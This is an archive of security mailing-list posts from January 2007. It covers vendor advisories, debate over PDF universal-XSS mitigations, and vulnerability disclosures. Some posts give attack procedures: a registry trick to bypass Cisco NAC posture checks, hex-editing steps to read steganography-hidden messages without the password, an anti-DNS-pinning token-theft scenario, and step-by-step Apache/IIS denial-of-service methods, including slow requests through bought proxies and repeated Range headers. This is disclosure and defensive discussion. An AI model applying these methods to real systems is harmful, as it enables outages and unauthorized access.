Hi all,

 Another possible solution is to use the Apache mod_security to filter that
kind of urls.


2007/1/4, pdp (architect)  [EMAIL PROTECTED]:

ahhh, fragment identifiers make sense to browsers only. they are not
 send to the server

 On 1/4/07, der wert [EMAIL PROTECTED] wrote:
  The best solution I see would be to keep all pdf files in a non-web
  accessible location on the web server, then have all the pdf files
  through a script such as a php script. In php you can check the what the
  REQUEST_URI is, if it isn't equal to what you were expecting which would
  mean extra parameters were taken away or added then you could just have
  php script not output the pdf file since that would mean someone had been
  tampering with the URI.
  Get free, personalized online radio with MSN Radio powered by Pandora.

 pdp (architect) | petko d. petkov

 The Web Security Mailing List:

 The Web Security Mailing List Archives: [RSS Feed]

 Un saludo,

 This message was written entirely with recycled electrons.

 main(){int j=1234;char
 iqgbgxmsuspcpdofeqgbnek.;char *strchr(const char *,int);while(
 *i){j+=strchr(t,*i++)-t;j%=sizeof t-1;putchar(t[j]);}
return 0;}


 Un saludo,

 This message was written entirely with recycled electrons.

 main(){int j=1234;char


2007-01-08 Thread rPath Update Announcements
rPath Security Advisory: 2007-0001-1
Published: 2007-01-08
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:[EMAIL PROTECTED]:devel//1/2.0.3-1.7-1


Previous versions of the package are vulnerable to an
arbitrary code execution attack.  When opens an
intentionally-malformed .wmf or .emf file, it executes arbitrary code
provided by the attacker.

[SECURITY] [DSA 1247-1] New libapache-mod-auth-kerb packages fix remote denial of service

2007-01-08 Thread Noah Meyerhans
Hash: SHA1

Debian Security Advisory DSA-1247-1[EMAIL PROTECTED] Noah Meyerhans
January 08, 2007

Package: libapache-mod-auth-kerb
Vulnerability  : heap overflow
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2006-5989
BugTraq ID : 21214
Debian Bug : 400589

An off-by-one error leading to a heap-based buffer overflow has been
identified in libapache-mod-auth-kerb, an Apache module for Kerberos
authentication.  The error could allow an attacker to trigger an
application crash or potentially execute arbitrary code by sending a
specially crafted kerberos message.

For the stable distribution (sarge), this problem has been fixed in
version 4.996-5.0-rc6-1sarge1.

For the unstable version (sid) and the forthcoming stable version
(etch), this problem has been fixed in version 5.3-1.

We recommend that you upgrade your libapache-mod-auth-kerb package.

Upgrade instructions

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 3.1 (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:
Size/MD5 checksum:  744 5e045be08755cab316754a7f214eeaae
Size/MD5 checksum:49849 3ebbb5101629ddd8917159c1cbdf20ab
Size/MD5 checksum:68787 b6a6c80b25b362eb7394f69cdc91f76d

amd64 architecture (AMD x86_64 (AMD64))
Size/MD5 checksum:28574 65078aa7e78f2728499849047eaf2fbb
Size/MD5 checksum:27148 60ce4d39ac022335bd98ea7ed412f24d

arm architecture (ARM)
Size/MD5 checksum:24078 053e0b54c348251be97c7708d43b5542
Size/MD5 checksum:25498 e1882b8b0e408cb2339ef4d43c800bd7

hppa architecture (HP PA RISC)
Size/MD5 checksum:28796 e29c79c55af53fc66cc1ea9084c63403
Size/MD5 checksum:27246 4d2394e0fc2a429c03ad6063c9ea2cce

i386 architecture (Intel ia32)
Size/MD5 checksum:25014 20666ea4edbce196ba0b4ea120425af5
Size/MD5 checksum:27176 6e7e40781f4beadec9226a918c8d4591

ia64 architecture (Intel ia64)
Size/MD5 checksum:31886 8146de1df6e65b32e213bfdc9b1320d2
Size/MD5 checksum:33946 a2f93809df0703311c64ab28bc71a435

m68k architecture (Motorola Mc680x0)
Size/MD5 checksum:24592 111a715b11307ad90a8c3c72d144067d
Size/MD5 checksum:24904 058b9470f905b33b7db5c1b7c82b704c

mips architecture (MIPS (Big Endian))


Re: Sun java System Messenger Express XSS

2007-01-08 Thread b2wang
Interesting but yet I don't any possiblity of an attack.

URL like


is generated when user login failed and JES webmail server issued an HTTP 

The webmail server itself will not issue URL like that unless the proxy server 
which the browser connects to get hacked.  But if a proxy server gets hacked, 
that is the end of game.  Your BofA account, stock accounts are all 
compromised, which has nothing to do with JES messaging server itself.

Secondly, one can look closer to what harm that URL can do.  Nothing.  That URL 
points to a LOGIN page where users have NOT logged in.  With no 
credential/cookie/session, a static login page cannot lead to any attack.

cisco nac bypass vulnerability - cisco trust agent

2007-01-08 Thread thorben schroeder
hello list,
the  cisco  network  admission control system gives an adminitrator the
chance  to  check  the  clients,  whether  they have installed certain
patches / hotfixes. this check is not reliable.

programm version: cisco trust agent (probably all versions)
os: windows xp sp2
vendor informed: yes (got only automated feedback mail)
severity: low - med

vulnerability:  the cta checks the patch level only with some registry
queries which can be manipulated

- Cisco:Host:Hotfix contains KB919007 as posture validation
- the KB919007 hotfix is not installed!
- copy the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows
XP\SP3\KB873339 key and change it into a KB919007 key
- result: client is healty


RE: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread Martin O'Neal

 One possible work around on the server side:
 Direct your web server to serve .pdf files as mime type 
 application/octet That way the files will be saved to 
 disk instead of opening in the browser plug in.

Firefox works fine with this, but depending upon which version of IE you
have (and which platform it is installed on) this probably wont work by
default, as IE will ignore the MIME type and base it's decision on the
file extension.


CONFIDENTIALITY:  This e-mail and any files transmitted with it are
confidential and intended solely for the use of the recipient(s) only.
Any review, retransmission, dissemination or other use of, or taking
any action in reliance upon this information by persons or entities
other than the intended recipient(s) is prohibited.  If you have
received this e-mail in error please notify the sender immediately
and destroy the material whether stored on a computer or otherwise.
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of Corsaire Limited, unless otherwise specifically stated.
Corsaire Limited, 3 Tannery House, Tannery Lane, Send, Surrey, GU23 7EF
Telephone: +44(0)1483-226000  Email:[EMAIL PROTECTED]

Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread Amit Klein

RSnake wrote:
The point is - someone with shared IP is vulnerable ONLY to an 
attacker with the same IP. Which makes attacks much less generic and 
much more painful. Rock solid it ain't, but I think it's a pretty 
good band-aid until all (hmmm...) clients upgrade to Acrobat Reader 8.0.


Sorry for responding late, I've been doing some consulting work.

After talking with some people on my blog I don't believe that is the
case (at least not in theory).  Let's say Alice has an account with
Bob's website.  Cathy is an attacker who owns a website that uses
anti-DNS pinning.  
Of course anti-DNS pinning would work against my algorithm, but anti-DNS 
pinning is a larger problem, one that is out of scope here. I mean - so 
many things are broken when anti-DNS pinning is introduced... especially 
any IP-based security techniques. Anti-DNS pinning should be solved by 
browser vendors (if possible), regardless of the PDF problem. And at any 
rate, I feel that my algorithm makes the attack harder because it forces 
it to involve anti-DNS pinning.

Anyway, if you worry about the current anti-DNS pinning techniques, you 
may simply serve your PDF files in HTTPS only. I believe this will 
defeat the present day anti-DNS pinning techniques (in the sense that 
the user under anti-DNS pinning attack will get a certificate error 
before being served the PDF).


createauction (cats.asp) Remote SQL Injection Vulnerability

2007-01-08 Thread emel_gw_ini
createauction (catid) Remote SQL Injection Vulnerability
 HItamputih Crew 
# hitamputih Advisory
# Discovered By : IbnuSina
# Software: createauction
# Vendor :
# Method: SQL Injection
# Thanks To : akukasih,nyubi,irvian and all  #hitamputih crew





Re: cisco nac bypass vulnerability - cisco trust agent

2007-01-08 Thread Stefano Zanero
thorben schroeder wrote:

 the  cisco  network  admission control system gives an adminitrator the
 chance  to  check  the  clients,  whether  they have installed certain
 patches / hotfixes. this check is not reliable.

This is a known vulnerability of any system of NAC which trusts a client
based agent. Since you cannot determine what program is running on the
remote system, you cannot really trust what it is declaring.

So, nothing really new in what you reported (you could also reverse
engineer and write a client which answers the server exactly what it
wants to hear).

The point is knowing and accepting the unavoidable limits of such


GForge Cross Site Scripting vulnerability

2007-01-08 Thread jose . palanco
GForge Cross Site Scripting vulnerability
Version:Tested on GForge 4.5.11
Discovered by:  José Ramón Palanco: jose.palanco(at)eazel(dot)es

GForge is vulnerable to a security vulnerability that allow Cross-Site 
Scripting attacks. Due to improper filtering, a remote attacker can cause a 
cross site scripting.

To exploit any attacker may send via GET method the words variable to:
to http://site/search/advanced_search.php?group_id=Xsearch=1
where X is any active project in the gforge installation.

discovered: 26/10/2006
published: 8/01/2007

Original advisory:

Re: PHP as a secure language? PHP worms? [was: Re: new linux malware]

2007-01-08 Thread Jim Manico
 I'm quite confident that someone could develop a very secure
interpreted language.

Thats a moot point, it's not about languages anymore, it's about
FRAMEWORKS on top of languages with security baked in.

In Java my team has one validation servlet that every request must go through 
- so even if my junior programmers screw up, I'm catching it in a 
framework-like way. Struts Java framework allows you to validate form/request 
data via XML configuration so an InfoSec guy can add regex's to each-and-every 
element of your forms AFTER the fact WITHOUT programmer intervention.

In .NET, we win. .NET does not scale well (MySpace is suffering the cost of 
trying to deploy .NET globally, poor guys) BUT - .NET has a framework that 
automagically does input validation for you - and almost does it well. There 
WAS a 2.0 framework input validation bug a few months back, but MS patched it 
up within hours of discovery, and heck, most PPL are at .NET 1.1 still. Even 
the craptacular Drupal (4.7.4+) CMS PHP framework does CSRF protection very 
well via form keys. How many of your web apps defend again CSRF right now? 

I prefer Java and am not fond of M$, but I must nod my head to the security 
considerations baked into .NET (If only it scaled well) and some of the more 
mature Java frameworks like Struts. 

In the future - we will code web apps only to frameworks (or raw languages will 
start to add framework features at the language core). No more of this raw 
language BS for web apps (sorry Swa, wherever you are). It's all about the 
frameworks! Programmers are NOT coding more securely, I've seen architects 
recently not even able to TALK to me about CSRF, let alone defend against it! 
Pick a framework with a good security history, use it, and track it in a rather 
meticulous way.

- Jim

Ronald Chmara wrote:
 On Jan 2, 2007, at 10:37 AM, Darren Reed wrote:
 In some mail from Jim Harrison, sie said:
 Again; I agree with and fully support the effort.  What I'm trying to
 point out is the literal impossibility of actually achieving genuine
 security in either our code or the languages it's written in.
 Well given that the ultimate root of any invention is going to be
 human, you're saying genuine security is impossible.

 Genuine Security is a marketing term (a misleading one, at that). A
 programming language without security risks is pretty much useless. A
 capable web programming language without security risks is darned near

 I'm quite confident that someone could develop a very secure
 interpreted language.  It might not do a lot, but it could easily
 be done (even if only to prove you wrong) - if one doesn't already
 exist.  I could probably even prove a case with /bin/sh.

 Sorry, /bin/sh needs read access to /etc/passwd for uname checks, and
 thus, allows for information disclosure.


 LOGO is pretty safe to use. I'm not sure how much you can do with it
 anymore. You might be able to draw web pages really slowly.

 The problem we have right now is that the language commonly used for
 dynamic web pages on non-Microsoft platforms is PHP and that this has
 not been engineered *for security*.

 PHP was engineered with the power (and responsibilities) of C. It
 allows for on-the-fly database administration, file access at the
 level of permission given to the web server process, and input/output
 at the level of raw data streams.

 PHP is not a web scripting language, so much as a scripting
 interface to raw binary libraries on the disk, and raw machine
 resources. Thus, if an admin wants to build a PHP program to
 administer a massive DB cluster at the CLUI level, they can. If they
 want to run the world's largest online encyclopedia, they can.

 They can also write an address book.

 The goal of a language such as PHP should be to make it possible
 to do what is required without the person using it needing to know
 anything about security or secure programming practices.

 I think you might be a tad confused about the goals of PHP, or hoping
 that their goals match yours.

 PHP, which stands for PHP: Hypertext Preprocessor is a widely-used
 Open Source general-purpose scripting language that is especially
 suited for Web development and can be embedded into HTML. Its syntax
 draws upon C, Java, and Perl, and is easy to learn. The main goal of
 the language is to allow web developers to write dynamically generated
 webpages quickly, but you can do much more with PHP.

 Note: web developers, not bored college students who tend to put
 SQL arguments into a GET string or oops, I didn't bother to check my
 args because the bong distracted me.

 Just because it's easy to learn how to use a gun does *not* give
 people license to shoot themselves in the foot and then complain that
 the gun was too easy to use.

 Just as
 people using perl generally don't need to worry about buffer

 Er, what? As soon as a perl user glues into an external library,
 they better start to worry 

Re: Vendor guidelines regarding security contacts

2007-01-08 Thread security curmudgeon

: We frequently see requests for contact on this mailing list.  Readers 
: are encouraged to ensure that their software vendors are aware of the 
: following documents, which have more specific guidelines for vendors to 
: establish.  Because these documents have been co-authored by major 
: organizations, they might provide more leverage for researchers who have 
: difficulty in reaching unresponsive or uninterested vendors. Whether you 
: subscribe to the whole responsible disclosure process or not, 
: presumably most of us agree that it's important for vendors to be easily 
: reachable.

: The US Department of Homeland Security's Vulnerability Disclosure
: Framework document here:
: [..]
: Those are from

If an organization doesn't follow the above guidelines for any reason, 
they should at the very least make a reasonable effort to follow RFC 2142.


   This specification enumerates and describes Internet mail addresses
   (mailbox name @ host reference) to be used when contacting personnel
   at an organization.  Mailbox names are provided for both operations
   and business functions.  Additional mailbox names and aliases are not
   prohibited, but organizations which support email exchanges with the
   Internet are encouraged to support AT LEAST each mailbox name for
   which the associated function exists within the organization.

Specifically section 4 which requests the use of a 'security' mailbox.


   Operations addresses are intended to provide recourse for customers,
   providers and others who are experiencing difficulties with the
   organization's Internet service.

   ABUSE  Customer Relations  Inappropriate public behaviour
   NOCNetwork Operations  Network infrastructure
   SECURITY   Network SecuritySecurity bulletins or queries

[ MDKSA-2007:003 ] - Updated avahi packages fix DoS vulnerability

2007-01-08 Thread security

Hash: SHA1

 Mandriva Linux Security Advisory MDKSA-2007:003
 Package : avahi
 Date: January 8, 2007
 Affected: 2007.0
 Problem Description:
 The consume_labels function in avahi-core/dns.c in Avahi before 0.6.16
 allows remote attackers to cause a denial of service (infinite loop)
 via a crafted compressed DNS response with a label that points to

 Updated packages are patched to address this issue.

 Updated Packages:
 Mandriva Linux 2007.0:

 Mandriva Linux 2007.0/X86_64:

Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread Amit Klein


1. In private communication, Tom Spector observed that the cookie 
doesn't add any significant security. In retrospect, I could have 
omitted it completely. It's there as a remnant of a previous idea I had. 
In other words, I see nothing wrong with the following, simpler and more 
elegant algorithm (Look ma - no cookie):

IF the URL doesn't contain token_query, then:
  calculate X=encrypt_with_key(server_time, client_IP_address)
  redirect to file.pdf?token_query=X

ELSE IF the URL contains token_query, and 
decrypt(token_query).IP_address==client_IP_address and 

  serve the PDF resource as an in-line resource

  serve the PDF resource as a save to disk resource via a proper 
choice of the Content-Type header (and/or an attachment, via 

And big thanks to Tom who pointed this out.

2. While thinking more about this solution, I observed that if the 
attacker can have an agent sharing the same IP address with the victim 
(by agent I mean an entity that can communicate with the target web site 
and read back its response data), then the algorithms I suggested will 
not be effective. Note that an attacker can share IP address with the 
victim when both share a forward proxy (e.g. some universities and 
ISPs), or when the attacker and victim share the same machine 
(multi-user environment). Still, that narrows down the attack surface 


Amit Klein wrote:
It seems that I forgot all about Flash when I wrote that (the 
irony...). The solution I proposed is not secure enough as-is. It is 
trivial to write a SWF object that will request 
file.pdf?token_query=123 and add a Cookie: token_cookie=123. This is 
discussed in yours truly's Forging HTTP request headers with Flash ( and in Rapid7's Rapid7 
Advisory R7-0026 - HTTP Header Injection Vulnerabilities in the Flash 
Player Plugin (
Even adding cryptographic secret, time-based entropy or use counter 
doesn't help - all this can be circumvented by a server script on the 
attacker's site preparing the HTTP request and communicating it in 
real-time to the SWF object at the victim's browser.
The solution I could come up with is to tie X to the IP address of the 
client. Yes, I know - it's ugly, and it doesn't work 100% of the 
cases. But you stand nothing to lose if you simply fall back to the 
save to disk option, suggested by an anonymous SlashDot submitter (
So the more secure solution, as I see it, is as following:
Apply only for PDF resources:
IF the URL doesn't contain token_query, then:

   calculate X=encrypt_with_key(server_time, client_IP_address)
   redirect to file.pdf?token_query=X with Set-Cookie: token_cookie=X 
to expire at server_time+10sec.
ELSE IF the URL contains token_query, and token_query==token_cookie 
and decrypt(token_query).IP_address==client_IP_address and 

   serve the PDF resource as an in-line resource
   serve the PDF resource as a save to disk resource via a proper 
choice of the Content-Type header (and/or an attachment, via 
Hopefully this should work. But it's definitely less elegant than the 
original (flawed) suggestion.

Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread RSnake
2. While thinking more about this solution, I observed that if the attacker 
can have an agent sharing the same IP address with the victim (by agent I 
mean an entity that can communicate with the target web site and read back 
its response data), then the algorithms I suggested will not be effective. 
Note that an attacker can share IP address with the victim when both share a 
forward proxy (e.g. some universities and ISPs), or when the attacker and 
victim share the same machine (multi-user environment). Still, that narrows 
down the attack surface significantly.

It should be noted that this isn't as rare as just a few universities
and ISPs.  This also happens in lots of corporate networks (rogue user
on the internal network),  it happens with lots of internet cafe's, it
happens with AOL (~5MM users) and it happens with TOR users.  So while,
yes, I agree it is better than nothing it is hardly a rock solid
solution for anyone on a shared IP.


Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread Amit Klein

RSnake wrote:
2. While thinking more about this solution, I observed that if the 
attacker can have an agent sharing the same IP address with the 
victim (by agent I mean an entity that can communicate with the 
target web site and read back its response data), then the algorithms 
I suggested will not be effective. Note that an attacker can share IP 
address with the victim when both share a forward proxy (e.g. some 
universities and ISPs), or when the attacker and victim share the 
same machine (multi-user environment). Still, that narrows down the 
attack surface significantly.

It should be noted that this isn't as rare as just a few universities
and ISPs.  This also happens in lots of corporate networks (rogue user
on the internal network),  it happens with lots of internet cafe's, it
happens with AOL (~5MM users) and it happens with TOR users.  So while,
yes, I agree it is better than nothing it is hardly a rock solid
solution for anyone on a shared IP.

The point is - someone with shared IP is vulnerable ONLY to an attacker 
with the same IP. Which makes attacks much less generic and much more 
painful. Rock solid it ain't, but I think it's a pretty good band-aid 
until all (hmmm...) clients upgrade to Acrobat Reader 8.0.


Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread RSnake
The point is - someone with shared IP is vulnerable ONLY to an attacker with 
the same IP. Which makes attacks much less generic and much more painful. 
Rock solid it ain't, but I think it's a pretty good band-aid until all 
(hmmm...) clients upgrade to Acrobat Reader 8.0.


Sorry for responding late, I've been doing some consulting work.

After talking with some people on my blog I don't believe that is the
case (at least not in theory).  Let's say Alice has an account with
Bob's website.  Cathy is an attacker who owns a website that uses
anti-DNS pinning.  Cathy wants Alice's credentials from Bob's website.

1) Alice visit's Cathy's malicious website that points
to (Cathy's IP).
2) Cathy uses an XMLHTTPRequest to tell Alice's browser to visit in a few seconds and times out the DNS entry immediatly.
3) Alice's browser connects to but Cathy has shut down
the port.  The browser DNS pinning no longer points to
and instead it asks Cathy's bind server where the new IP of is.
4) Cathy's bind server now points to (Bob's server).
5) Alice's browser now connects to and reads the token
from that page (cookie, redirect, or whatever) via XMLHTTPRequest and
forwards that information to Cathy's other website
6) Cathy reads Alice's token and then forwards Alice's browser to Bob's
server (not the IP, but the actual address) with Alice's token (if the
token is a cookie we can use the Flash header forging trick).  Alice's
cookie is not yet compromised because she is looking at a different
website, and her browser does not send the cookie, yet.
7) Alice's connects to Bob's server with the PDF anchor tag and the
correct token to view the PDF.  Since the token is bound by IP the token
8) Alice executes Cathy's malicious JavaScript malware in the context of
Bob's web server.

It's ugly, but it should work, in theory.  Clear as mud?


Cracking Steganography Application in less than ONE minute

2007-01-08 Thread thesinoda
Good day

Direct Link to Advisory

Affected Product

Steganography 1.7.1 and 1.8 (latest).

Bug Type and Date
Type: Bad Design
Date: 01/06/2007

Bug Results
Cracking encrypted steganorgaphy files without any bruteforce.

Bug Description
You can crack steganography encrypted files very easy in fact in less than one 
minute. The problem is similar to the bug I found in PGP last year.

First you have to identify the steged files. Steganography application leave a 
footprint after you stego a file.

If you look at the end of your steged file you will notice it will end with 30 
00 02 FF FF. So a simple HEX search will reveal all steged files. 

So now we have identified the steged, the next step is to access the HIDDEN 
message without cracking the password. Here is how


Step 01

1- We use a file cover (carrier file) called picture_original.jpg

2- We will hide inside it a message Hello Adonis

3- We will use a password aa

4- We generated the steged file we will call it picture_with_hidden_msg.jpg

To access the hidden message WITHOUT the original password aa we will do 
the followings:

1- We will use any other picture file say mypicture.jpg

2- We will hide inside it a message WHATEVER

3- We will use a password a

4- We generate the steged file we will call it mypicture_steg.jpg

5- We will open Both pictures in a hex editor

6- We will replace the last 20 bites of  picture_with_hidden_msg.jpg with the 
one from mypicture_steg.jpg

7- Save picture picture_with_hidden_msg.jpg

8- Open it using a as password. YES we overwrite the password with something we 

Simple hein !!!


Re: a cheesy Apache / IIS DoS vuln (+a question)

2007-01-08 Thread Gadi Evron
On Wed, 3 Jan 2007, William A. Rowe, Jr. wrote:
 Michal Zalewski wrote:
  I feel silly for reporting this, but I couldn't help but notice that
  Apache and IIS both have a bizarro implementation of HTTP/1.1 Range
  header functionality (as defined by RFC 2616). Their implementations allow
  the same fragment of a file to be requested an arbitrary number of times,
  and each redundant part to be received separately in a separate
  multipart/byteranges envelope.
 Batten down the hatches!
(An example would be an old-fashioned attack on a server that happens
to host multi-gigabyte ISO files or movies - simply request them
many times and let window scaling do the rest... of course, most
high-profile sites are smart enough to host static HTML and basic layout
elements separately from such bandwidth-intensive and non-essential
content, so it still makes sense to take note of Range behavior).
 Seriously, HTTP pipelining can accomplish EXACTLY the same thing with minimal
 pain.  If you have an issue with this behavior, of HTTP, then you have an
 issue with the behavior under FTP or a host of other protocols.  And as you
 say, simple enough to find some 1.5mb pdf's.  But you expect 1gb window sizes
 to actually succeed?
 In 95% of the cases that follow your comment above, although the load may
 be often be distributed between boxes based on computational intensity, it
 is nearly always shoved down the same pipe in the end.
  Combined with the functionality of window scaling (as per RFC 1323)
 is exactly where your concern should lay - socket kernel-level control of
 unrealistic window scaling, and similar scaling restrictions at the router
 With the host of real issues out there in terms of massively parallel DDoS
 infrastructures that abound, this is, as you say, quite a silly report.

Wrong. Any vulnerability, no matter how many others are out there or how
unlikely, is indeed a vulnerability.

As one of the people leading the battle againt what you refer to as
massively parallel DDoS infrastructures, I can tell you I am almost
inclined to giggle here.

Is all you are saying: YES but mine is better?


Re: RE: [Full-disclosure] Concurrency strikes MSIE (potentially exploitablemsxml3 flaws)

2007-01-08 Thread socket69
i tried this with IE7 on Vista Ultimate, 45mins later and its still working as 

However I do get a javascript error: (Sorry had to retype it out)

Line: 0
Char: 0
Error: The following tags where not closed: foo, foo, foo, foo, foo, foo, foo, 
foo, foo, foo, foo, foo, foo, foo, foo, foo, foo, foo, foo, foo, foo, foo, foo, 
foo, foo, 
Code: 0

Re: SAP Security Contact

2007-01-08 Thread Nicob
Le vendredi 05 janvier 2007, Thor (Hammer of God) a écrit :

 Something like [EMAIL PROTECTED] may seem obvious, but it's better if you
 list specific contact info so it can be easily found.

I don't want to be rude but :
- [EMAIL PROTECTED] is the only standardized security contact (as
defined by RFC 2142)
- googling [EMAIL PROTECTED] would bring some results
- this was already answered on the Full-Disclosure mailing list
- the OSVDB Vendor Dictionary contains a record for SAP
- even the SecurityFocus site has some references to this email
address :


Re: FON Router allows anonymous web access

2007-01-08 Thread Thierry Zoller
Dear All,

lfgnd La Fonera routers distributed by FON allow web access to
lfgnd unauthenticated users via DNS tunneling.

Have been in a Hotel recently? I think actually we should post those
that are NOT vulnerable to this rather then post those who are. Pun

Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

RFID open source library - RFIDIOt code release - version 0.1k

2007-01-08 Thread Adam Laurie


Over the Christmas break I did quite a bit of work on the code and have 
added a hardware abstraction layer that allows support for readers other 
than the ACG, and to test it I've added limited support for the Frosch 
Hitag reader.

New features in this release:

  Program Hitag2 to EM4x02 / Unique
  Reset Hitag2 to default state (Frosch only)
  Read German passports
  Various tidy-ups and improvements

Code can be found here:

Adam Laurie Tel: +44 (0) 1304 814800
The Bunker Secure Hosting Ltd.  Fax: +44 (0) 1304 814899
Ash Radar Station
Marshborough Road
Sandwichmailto:[EMAIL PROTECTED]
CT13 0PL
UNITED KINGDOM  PGP key on keyservers

Re: a cheesy Apache / IIS DoS vuln (+a question)

2007-01-08 Thread bugtraq

to kill is enough not to finish the request and let it timeout on server side.
no ddos/dos protection layers can stand against this attack (as far as i know) 
and the scenario is simple 
1. fingerprint the timeout on serverside
2. dig the sitemap from target
3. build a list of browsers to advertise to server during request
4. buy proxies from black market 
5. start requests thru proxies to target
requests are never to be finished. randomized headers, following the sitemap. 
send few bytes, wait smthin less than server timeout and send the next few 
bytes, never finish the request. at least apache will wait for the request to 
finish. with 2k proxies starting 3-4 requests (browsers sending parallel 
requests, target should allow more than one request) u can generate a contigous 
flow of 6k to 8k requests to apache. starvation will start sooner apache will 
just consume its resources waiting for bogus requests to finish, he will never 
read a full request but will just timeout waiting for data. the thing is you 
can make the wait process longer, because (at least in some implementation, i 
think i tested 1.3.x and 2.0.x), you send first few bytes then put apache in 
wait he will start his timer but when u send the next few bytes after X seconds 
he will reset his timer for that request. slow , sure-thing death.

with a default timeout of 300 seconds on server side and request headers having 
lets say 512 bytes of data, sending max rand(5,10) bytes before timeout comes 
in u will keep a thread busy for at least 300*50 seconds with one single 
request  ... discard connection when requewst is sent and just start a new one, 
u dont have to consume bw by reading response

a quick fix for this can be available at least on bsd, there is accf_http that 
can be modified not to pass the connection to apache until a full request is 
read (either get or post, full, not just the first get request header, ofcourse 
this can be even worst for a lot of post data). prolly there are ddos middle 
layers that can do the thing but i did not found one yet. at least the big guys 
on the market seem to be vulnerable.
you can't find patterns to stop this kind of attack cuz you simulate a real 
browser 100%, all u can do is to readahead the request and filter bogus before 
apache does. 99% from apache setups coming with default config, never modified 
by owner. thinking cpanel, at least. its not about consuming srv bw, its just 
about making it choke and its happening very fast.

On Thu, Jan 04, 2007 at 12:27:11AM +0100, Michal Zalewski wrote:
 I feel silly for reporting this, but I couldn't help but notice that
 Apache and IIS both have a bizarro implementation of HTTP/1.1 Range
 header functionality (as defined by RFC 2616). Their implementations allow
 the same fragment of a file to be requested an arbitrary number of times,
 and each redundant part to be received separately in a separate
 multipart/byteranges envelope.
 Combined with the functionality of window scaling (as per RFC 1323), it is
 my impression that a lone, short request can be used to trick the server
 into firing gigabytes of bogus data into the void, regardless of the
 server file size, connection count, or keep-alive request number limits
 implemented by the administrator. Whoops?
 Since there are easier tools to (D)DoS a service, and since nothing about
 this attack is particularly innovative, I'll just describe what's on my
 mind... let's say that is a medium-size static
 file we found on the server (something on the order of 300 kB for Apache
 and 150 kB for IIS is optimal). An attack would then look roughly the
 following way:
   1) Connect to the server (as many times as allowed by the remote party
  or deemed appropriate for the purpose of this demonstration),
   2) Negotiate a high TCP window size for each of the connections (1 GB
  should be doable),
   3) Send a partial request as follows for each of the connections:
  GET /foo.html HTTP/1.1
  Range: bytes=0-,0-,0-,0-,0-... (up to 8 kB for Apache, 16 kB for IIS)
  Each 0- would generate a separate multipart/byteranges containing
  the entire file (bytes from 0 'til EOF).
   4) Send a closing newline within each of the connections to commit
  the request,
   5) Silently drop the connections, possibly re-connect to dial-up / DSL
  to duck the responses that would keep pouring at full speed until
  TCP window size is exhausted or an ISP-level non-delivery /
  congestion control mechanism kicks in (and isn't filtered out
  down the route).
 This should cause the server to send gigabytes of data, with only a
 minimal bandwidth expense on the attacker's end.
 Well, that's the story.
 This isn't the only fire-and-run-away attack that seems to be made much
 more feasible with the help of window scaling (by making it more tempting
 for the attacker to request tons of data and then go off-line 

RE: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-08 Thread Guy Podjarny

Another similar option is to use a single-use random value (not
encrypted), that gets invalidated after it's served back. 

You can save the random value on the (non persistent) session
(server-side), and serve the PDF only if the correct random value is
Once a random value has been used, it's cleared (single-use).
In any case where the wrong value is provided - recreate a random value,
save it on the session, and redirect to the PDF with it (same behavior
as when the token isn't provided at all).

So the flow is:

IF the URL Session[X] != null (we have a previously created random val)
AND request contains token_query AND token_query==Session[X]:

Session[X] = null --  Clear the token (it's only
good for one use)
serve the PDF resource as an in-line resource

calculate X = new random token value
Session[token] = X   --save X on session (works for that
user only)
redirect to file.pdf?token_query=X
Time delays can be added for extra security, but since the session isn't
persistent, it'll usually not be required.

One more note about the redirect:
It seems that firefox retains the fragment portion when you redirect. 
So if you're browsing:
http://server/page.aspx#target And you redirect to
http://server/page.aspx, Firefox will keep the #target fragment!

To work around this, you can redirect to http://server/page.aspx#a - by
adding a fragment to your redirect, you make firefox get rid of the old


-Original Message-
From: Amit Klein [mailto:[EMAIL PROTECTED] 
Sent: Thursday, January 04, 2007 4:38 PM
To:; Web Security
Subject: Re: [WEB SECURITY] Universal XSS with PDF files: highly


1. In private communication, Tom Spector observed that the cookie
doesn't add any significant security. In retrospect, I could have
omitted it completely. It's there as a remnant of a previous idea I had.

In other words, I see nothing wrong with the following, simpler and more
elegant algorithm (Look ma - no cookie):

IF the URL doesn't contain token_query, then:
   calculate X=encrypt_with_key(server_time, client_IP_address)
   redirect to file.pdf?token_query=X
ELSE IF the URL contains token_query, and
decrypt(token_query).IP_address==client_IP_address and
   serve the PDF resource as an in-line resource
   serve the PDF resource as a save to disk resource via a proper
choice of the Content-Type header (and/or an attachment, via

And big thanks to Tom who pointed this out.

2. While thinking more about this solution, I observed that if the
attacker can have an agent sharing the same IP address with the victim
(by agent I mean an entity that can communicate with the target web site
and read back its response data), then the algorithms I suggested will
not be effective. Note that an attacker can share IP address with the
victim when both share a forward proxy (e.g. some universities and
ISPs), or when the attacker and victim share the same machine
(multi-user environment). Still, that narrows down the attack surface


Amit Klein wrote:
 It seems that I forgot all about Flash when I wrote that (the 
 irony...). The solution I proposed is not secure enough as-is. It is 
 trivial to write a SWF object that will request 
 file.pdf?token_query=123 and add a Cookie: token_cookie=123. This is

 discussed in yours truly's Forging HTTP request headers with Flash ( and in Rapid7's Rapid7

 Advisory R7-0026 - HTTP Header Injection Vulnerabilities in the Flash 
 Player Plugin (
 Even adding cryptographic secret, time-based entropy or use counter 
 doesn't help - all this can be circumvented by a server script on the 
 attacker's site preparing the HTTP request and communicating it in 
 real-time to the SWF object at the victim's browser.
